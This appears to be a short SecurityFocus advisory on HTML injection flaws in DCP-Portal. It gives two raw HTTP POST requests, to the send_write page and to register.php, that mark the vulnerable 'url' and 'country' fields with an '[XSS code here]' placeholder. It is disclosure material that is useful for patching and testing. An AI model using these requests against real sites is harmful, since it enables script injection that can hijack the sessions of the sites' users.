DCP-Portal Multiple HTML Injection Vulnerabilities

The following examples are available:

POST /index.php?page=send_write HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

PHPSESSID=1&yname=1&yadd=1&fname=1&fadd=1&url=[XSS code here]


POST /register.php HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

PHPSESSID=1&sex=1&sex=1&name=1&surname=1&email=example@example.com&ad
dress=1&zip=1&city=1&country=[XSS code here]


 

Privacy Statement
Copyright 2010, SecurityFocus